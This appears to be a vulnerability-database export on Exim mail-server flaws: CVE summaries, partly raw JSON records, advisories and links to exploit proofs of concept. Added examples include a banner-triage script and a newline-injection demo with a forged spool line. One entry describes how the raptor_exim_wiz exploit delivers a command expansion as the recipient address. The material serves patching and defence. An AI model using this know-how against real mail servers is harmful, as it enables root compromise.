NVD CVE-2020-28020, CWE-190 (published 2021-05-06T13:15:00, modified 2022-06-28T14:11:00). CVSS v3.1 9.8 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H); CVSS v2 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P). Exim 4 before 4.92 allows Integer Overflow to Buffer Overflow, in which an unauthenticated remote attacker can execute arbitrary code by leveraging the mishandling of continuation lines during header-length restriction. Reference: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28020

NVD CVE-2020-28016, CWE-787 (published 2021-05-06T13:15:00, modified 2021-05-10T18:40:00). CVSS v3.1 7.8 HIGH (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H); CVSS v2 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C). Exim 4 before 4.94.2 allows an off-by-two Out-of-bounds Write because "-F ''" is mishandled by parse_fix_phrase. Reference: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28016

NVD CVE-2020-28009, CWE-190 (published 2021-05-06T13:15:00, modified 2021-05-10T19:49:00). CVSS v3.1 7.8 HIGH (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H); CVSS v2 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C). Exim 4 before 4.94.2 allows Integer Overflow to Buffer Overflow because get_stdinput allows unbounded reads that are accompanied by unbounded increases in a certain size variable. NOTE: exploitation may be impractical because of the execution time needed to overflow (multiple days). Reference: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28009

NVD CVE-2020-28014, CWE-269 (published 2021-05-06T13:15:00, modified 2022-07-12T17:42:00). CVSS v3.1 6.1 MEDIUM (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H); CVSS v2 5.6 (AV:L/AC:L/Au:N/C:N/I:P/A:C). Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. The -oP option is available to the exim user, and allows a denial of service because root-owned files can be overwritten. Reference: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28014

NVD CVE-2020-28026, NVD-CWE-Other (published 2021-05-06T13:15:00, modified 2022-07-12T17:42:00). CVSS v3.1 9.8 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H); CVSS v2 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C). Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters, relevant in non-default configurations that enable Delivery Status Notification (DSN). Certain uses of ORCPT= can place a newline into a spool header file, and indirectly allow unauthenticated remote attackers to execute arbitrary commands as root. Reference: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28026

NVD CVE-2020-28011, CWE-787 (published 2021-05-06T13:15:00, modified 2021-05-10T19:28:00). CVSS v3.1 7.8 HIGH (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H); CVSS v2 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C). Exim 4 before 4.94.2 allows Heap-based Buffer Overflow in queue_run via two sender options: -R and -S. This may cause privilege escalation from exim to root. Reference: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28011

NVD CVE-2020-28018, CWE-416 (published 2021-05-06T13:15:00, modified 2021-05-26T19:34:00). CVSS v3.1 9.8 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H); CVSS v2 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P). Exim 4 before 4.94.2 allows Use After Free in smtp_reset in certain situations that may be common for builds with OpenSSL. Reference: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28018

NVD CVE-2020-28013, CWE-787 (published 2021-05-06T13:15:00, modified 2021-05-10T18:43:00). CVSS v3.1 7.8 HIGH (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H); CVSS v2 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C). Exim 4 before 4.94.2 allows Heap-based Buffer Overflow because it mishandles "-F '.('" on the command line, and thus may allow privilege escalation from any user to root. This occurs because of the interpretation of negative sizes in strncpy. Reference: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28013

NVD CVE-2020-28010, CWE-787 (published 2021-05-06T13:15:00, modified 2021-12-03T19:59:00). CVSS v3.1 7.8 HIGH (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H); CVSS v2 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C). Exim 4 before 4.94.2 allows Out-of-bounds Write because the main function, while setuid root, copies the current working directory pathname into a buffer that is too small (on some common platforms). Reference: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28010

NVD CVE-2020-28012, NVD-CWE-Other (published 2021-05-06T13:15:00, modified 2022-07-12T17:42:00). CVSS v3.1 7.8 HIGH (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H); CVSS v2 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C). Exim 4 before 4.94.2 allows Exposure of File Descriptor to Unintended Control Sphere because rda_interpret uses a privileged pipe that lacks a close-on-exec flag. Reference: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28012

NVD CVE-2020-28008, CWE-269 (published 2021-05-06T13:15:00, modified 2021-05-10T20:17:00). CVSS v3.1 7.8 HIGH (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H); CVSS v2 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C). Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. Because Exim operates as root in the spool directory (owned by a non-root user), an attacker can write to a /var/spool/exim4/input spool header file, in which a crafted recipient address can indirectly lead to command execution. Reference: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28008

NVD CVE-2020-28024, CWE-787 (published 2021-05-06T13:15:00, modified 2022-06-28T14:11:00). CVSS v3.1 9.8 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H); CVSS v2 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P). Exim 4 before 4.94.2 allows Buffer Underwrite that may result in unauthenticated remote attackers executing arbitrary commands, because smtp_ungetc was only intended to push back characters, but can actually push back non-character error codes such as EOF. Reference: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28024

NVD CVE-2020-28007, CWE-59 (published 2021-05-06T13:15:00, modified 2021-05-10T20:17:00). CVSS v3.1 7.8 HIGH (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H); CVSS v2 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C). Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. Because Exim operates as root in the log directory (owned by a non-root user), a symlink or hard link attack allows overwriting critical root-owned files anywhere on the filesystem. Reference: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28007

NVD record: Exim 4 before 4.94.2 allows Out-of-bounds Read.
smtp_setup_msg may disclose sensitive information from process memory to an unauthenticated SMTP client.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2020-28023", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28023"], "modified": "2021-05-10T16:15:00", "cpe": [], "id": "CVE-2020-28023", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28023", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2023-06-06T14:43:52", "description": "Exim 4 before 4.94.2 allows Out-of-bounds Read because pdkim_finish_bodyhash does not validate the relationship between sig->bodyhash.len and b->bh.len; thus, a crafted DKIM-Signature header might lead to a leak of sensitive information from process memory.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, 
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2020-28025", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28025"], "modified": "2021-05-10T16:11:00", "cpe": [], "id": "CVE-2020-28025", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28025", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2023-06-06T14:43:54", "description": "Exim 4 before 4.94.2 allows Integer Overflow to Buffer Overflow in receive_add_recipient via an e-mail message with fifty million recipients. 
NOTE: remote exploitation may be difficult because of resource consumption.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2020-28017", "cwe": ["CWE-190"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28017"], "modified": "2022-10-04T15:02:00", "cpe": [], "id": "CVE-2020-28017", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28017", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-06-06T14:43:53", "description": "Exim 4 before 4.94.2 has Improper Restriction of Write Operations within the Bounds of a Memory Buffer. 
This occurs when processing name=value pairs within MAIL FROM and RCPT TO commands.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2020-28022", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28022"], "modified": "2022-06-28T14:11:00", "cpe": [], "id": "CVE-2020-28022", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28022", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-06-06T14:43:49", "description": "Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters. 
Local users can alter the behavior of root processes because a recipient address can have a newline character.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2020-28015", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28015"], "modified": "2021-05-10T18:08:00", "cpe": [], "id": "CVE-2020-28015", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28015", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-06-06T14:43:51", "description": "Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters. 
An authenticated remote SMTP client can insert newline characters into a spool file (which indirectly leads to remote code execution as root) via AUTH= in a MAIL FROM command.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2020-28021", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28021"], "modified": "2021-05-10T16:23:00", "cpe": [], "id": "CVE-2020-28021", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28021", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-05-27T14:33:11", "description": "Exim 4 before 4.94.2 has Execution with Unnecessary Privileges. By leveraging a delete_pid_file race condition, a local user can delete arbitrary files as root. 
This involves the -oP and -oPX options.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.3, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2021-27216", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.3, "vectorString": "AV:L/AC:M/Au:N/C:N/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27216"], "modified": "2022-06-28T14:11:00", "cpe": [], "id": "CVE-2021-27216", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-27216", "cvss": {"score": 6.3, "vector": "AV:L/AC:M/Au:N/C:N/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-06-13T14:24:16", "description": "A flaw was found in Exim versions 4.87 to 4.91 (inclusive). 
Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to remote command execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-05T14:29:00", "type": "cve", "title": "CVE-2019-10149", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2022-11-07T19:12:00", "cpe": ["cpe:/a:exim:exim:4.91", "cpe:/o:debian:debian_linux:9.0", "cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:canonical:ubuntu_linux:18.10"], "id": "CVE-2019-10149", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-10149", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:exim:exim:4.91:*:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2023-06-06T15:06:55", "description": "Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters. 
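A first triage step for the records above is to map a fleet's SMTP greetings onto the two version ranges they quote: Exim 4 before 4.94.2 for the 21Nails set, and 4.87 to 4.91 inclusive for CVE-2019-10149. The script below is an added example, not code from the article, Qualys or the Exim project; the greeting lines it contains are constructed for the demo, and the parser assumes Exim's default greeting, which names the version right after "ESMTP Exim".

```python
"""Triage Exim SMTP greetings against the version ranges quoted in the
records above.

Added example for this page, not code from the article, Qualys or the
Exim project. The greeting lines in SAMPLE_BANNERS are constructed.
"""
import re
from typing import Dict, List, Optional, Tuple

Version = Tuple[int, int, int]

# Ranges exactly as stated in the CVE descriptions above.
FIXED_21NAILS: Version = (4, 94, 2)   # "Exim 4 before 4.94.2"
WIZARD_FIRST: Version = (4, 87, 0)    # CVE-2019-10149: 4.87 ...
WIZARD_FIXED: Version = (4, 92, 0)    # ... to 4.91 inclusive

# Default greeting looks like "220 host ESMTP Exim 4.94.2 #2 Tue, ...";
# the "#2" after the version is a build tag, not part of the version.
_BANNER_RE = re.compile(r"\bExim\s+(\d+(?:\.\d+){0,2})\b")


def parse_exim_version(banner: str) -> Optional[Version]:
    """Return the Exim version in a 220 greeting as (major, minor, patch),
    padding missing components with 0, or None if Exim is not named."""
    m = _BANNER_RE.search(banner)
    if not m:
        return None
    parts = [int(p) for p in m.group(1).split(".")]
    while len(parts) < 3:
        parts.append(0)
    return (parts[0], parts[1], parts[2])


def assess(banner: str) -> Dict[str, object]:
    """Flag which of the two version ranges on this page a greeting falls in."""
    ver = parse_exim_version(banner)
    if ver is None:
        return {"version": None, "in_21nails_range": False,
                "in_cve_2019_10149_range": False}
    return {
        "version": ".".join(str(p) for p in ver),
        "in_21nails_range": ver < FIXED_21NAILS,
        "in_cve_2019_10149_range": WIZARD_FIRST <= ver < WIZARD_FIXED,
    }


def triage(banners: List[str]) -> List[Dict[str, object]]:
    """Assess a list of greetings, preserving order."""
    return [assess(b) for b in banners]


# Constructed greetings, not captured from real hosts.
SAMPLE_BANNERS = [
    "220 mx1.example.test ESMTP Exim 4.89 Tue, 04 May 2021 10:00:00 +0000",
    "220 mx2.example.test ESMTP Exim 4.92.3 #3 Tue, 04 May 2021 10:00:01 +0000",
    "220 mx3.example.test ESMTP Exim 4.94 #2 Tue, 04 May 2021 10:00:02 +0000",
    "220 mx4.example.test ESMTP Exim 4.94.2 #2 Tue, 04 May 2021 10:00:03 +0000",
    "220 mx5.example.test ESMTP Postfix",
]

if __name__ == "__main__":
    for banner, result in zip(SAMPLE_BANNERS, triage(SAMPLE_BANNERS)):
        print(f"{str(result['version'] or '-'):8} "
              f"21Nails={str(result['in_21nails_range']):5} "
              f"CVE-2019-10149={str(result['in_cve_2019_10149_range']):5} "
              f"{banner[:36]}")
```

The greeting is only a first cut. `smtp_banner` is configurable, so a greeting without a version is not evidence of a patched host, and distributions backport fixes without changing the upstream version string, so a host that reports 4.92 or 4.94 may already carry the 4.94.2 fixes. Confirm with the package changelog or `exim -bV` on the host before closing a finding.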
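CVE-2020-28015 and CVE-2020-28021 above share one mechanism: untrusted text (a recipient address, or the AUTH= parameter of MAIL FROM) carrying a newline is written into a line-oriented spool file that a root process later parses line by line, so the attacker gets to forge a whole extra line. The toy below is an added example, not Exim's spool format or code; it models that shape with a vulnerable writer next to a hardened one. Field names, the sample addresses and the injected line are constructed.

```python
"""Model of the line-delimiter flaw behind CVE-2020-28015 and CVE-2020-28021.

Added example for this page: a toy one-field-per-line record store that
reproduces the shape of the bug, not Exim's spool format or code. Field
names, the sample addresses and the injected line are constructed.
"""
from typing import Dict, List, Tuple

# Characters that let a value end the current line or the whole record.
_LINE_CONTROL = ("\r", "\n", "\x00")


def write_record_unsafe(fields: Dict[str, str]) -> str:
    """Vulnerable writer: values are copied into the file verbatim."""
    return "".join(f"{key}: {value}\n" for key, value in fields.items())


def write_record_safe(fields: Dict[str, str]) -> str:
    """Hardened writer: refuse any field that could forge an extra line."""
    for key, value in fields.items():
        if not key or ":" in key:
            raise ValueError(f"malformed key {key!r}")
        if any(ch in key + value for ch in _LINE_CONTROL):
            raise ValueError(f"line delimiter in field {key!r}")
    return write_record_unsafe(fields)


def read_record(blob: str) -> List[Tuple[str, str]]:
    """What the privileged consumer sees: one (key, value) pair per line.
    It cannot distinguish a forged line from a genuine one."""
    pairs = []
    for line in blob.splitlines():
        if line:
            key, _, value = line.partition(": ")
            pairs.append((key, value))
    return pairs


# Constructed attacker input: a recipient address with an embedded newline,
# the same trick the CVE-2020-28021 record describes for AUTH= in MAIL FROM.
INJECTED_RECIPIENT = "bob@example.test\ntransport: run-as-root"


def demo() -> Tuple[List[Tuple[str, str]], bool]:
    """Return what the consumer parses from the unsafe writer's output, and
    whether the hardened writer rejected the same input."""
    fields = {"sender": "alice@example.test", "recipient": INJECTED_RECIPIENT}
    parsed = read_record(write_record_unsafe(fields))
    try:
        write_record_safe(fields)
        rejected = False
    except ValueError:
        rejected = True
    return parsed, rejected


if __name__ == "__main__":
    parsed, rejected = demo()
    for key, value in parsed:
        print(f"{key:10} {value}")
    print("hardened writer rejected the input:", rejected)
```

The consumer of the unsafe file sees three fields although the client supplied two, and the forged one is indistinguishable from a genuine setting. The check belongs at the trust boundary, before anything is written, and it has to cover CR as well as LF, since some parsers strip a trailing CR and would accept a line the writer did not intend.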
AttackerKB assessments:

- CVE-2020-28015 (AKB:C9297F4A-1863-4574-885A-36C840DFF834, <https://attackerkb.com/topics/ivY75plubC/cve-2020-28015>, published 2021-05-06; CVSS v3.1 7.8, v2 7.2). Exim 4 before 4.94.2 has improper neutralization of line delimiters: local users can alter the behavior of root processes because a recipient address can have a newline character. Assessed attacker value: 0, 0, 0.
- CVE-2019-10149 (AKB:CCDE85CB-574C-401B-9892-9CAFDE0D120B, <https://attackerkb.com/topics/GjH2GsCJaj/cve-2019-10149>, published 2019-06-05; CVSS v3.1 9.8, v2 10.0). A flaw was found in Exim versions 4.87 to 4.91 (inclusive): improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to remote command execution. Assessed attacker value: 0, 0, 0.
- CVE-2019-10149 (AKB:D6CD45B9-F610-4480-99E7-80A4065DF5FD, <https://attackerkb.com/topics/jDinrhSIJh/cve-2019-10149>, published 2020-05-28; CVSS v3.0 9.8, v2 7.5). "Exim unauthenticated RCE with reports that it's been used by Sandworm since August 2019."

  Recent assessments:

  **ericalexanderorg** at May 28, 2020 4:49pm UTC reported: "Untested POC exists" and linked [https://github.com/MNEMO-CERT/PoC--CVE-2019-10149_Exim/blob/master/PoC_CVE-2019-10149.py](<https://github.com/MNEMO-CERT/PoC--CVE-2019-10149_Exim/blob/master/PoC_CVE-2019-10149.py>).

  **gwillcox-r7** at November 04, 2020 4:03pm UTC reported: "Untested POC exists" and linked the same PoC.

  Assessed attacker value: 5, 5, 3.

Check Point advisories:

- CPAI-2020-3455, "Exim Use After Free (CVE-2020-28018)", published 2022-02-15 (CVSS v3.1 9.8, v2 7.5): "A use after free vulnerability exists in Exim. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system."
- CPAI-2019-0743, "Exim Mail Server Remote Code Execution (CVE-2019-10149)", published 2019-06-12, modified 2019-10-30 (CVSS v3.1 9.8, v2 10.0): "A remote code execution vulnerability exists in Exim Mail Server. A remote attacker can exploit this issue by sending a specially crafted packet to the target server. Successful exploitation could result in execution of arbitrary code on the affected system."

GitHub exploit listings (the database keeps only the opening of each README; the identifiers are the export's own):

- CVE-2020-28018, "Exploit for Use After Free in Exim":
  - 347B3764-E644-581E-AFCB-F57D6EDDDA1E, published 2021-05-18. README begins "# POC CVE-2020-28018 / Introduction / The Qualys team has ..." (Spanish in the original, truncated in the export).
  - D4A90249-DD8A-53F0-BF5C-2A24402535BB, published 2021-05-15. README captured as a Persian-language (fa-IR) HTML page, no text.
- CVE-2019-10149, "Exploit for OS Command Injection in Exim":
  - 314FBFEA-2B26-54C6-BD8B-833438155879, published 2019-10-21. README begins "# CVE-2019-10149 - Exim 4.87 < 4.91 / Instructions for installing ...".
  - 910B7127-C06A-533E-BFC7-6ED36944EA87, published 2019-06-27. README captured as a Persian-language (fa-IR) HTML page, no text.
  - ADA0DDA5-BF6D-5656-87DA-B9E2BF0777ED, published 2019-10-27. README begins "# CVE-2019-10149 / CVE-2019-10149 : A flaw was found in Exim versi...".
  - 7DB4D6C1-099F-581F-8C39-DB454925C570, published 2019-06-13. README begins "# PoC-CVE-2019-10149_Exim / MNEMO-CERT has developed a PoC that..." (Spanish in the original, truncated in the export).
  - StickyExim: the raptor_exim_wiz local privilege escalation script by Marco Ivaldi (2019), which the export carries in full (listed with CVSS v2 7.5, `AV:N/AC:L/Au:N/C:P/I:P/A:P`). It delivers an Exim `${run{...}}` string expansion as the RCPT TO address over a local connection to port 25 and pads the message with 31 Received: headers so that delivery is deferred into the vulnerable code path:

```bash
#!/bin/bash

# raptor_exim_wiz - "The Return of the WIZard" LPE exploit
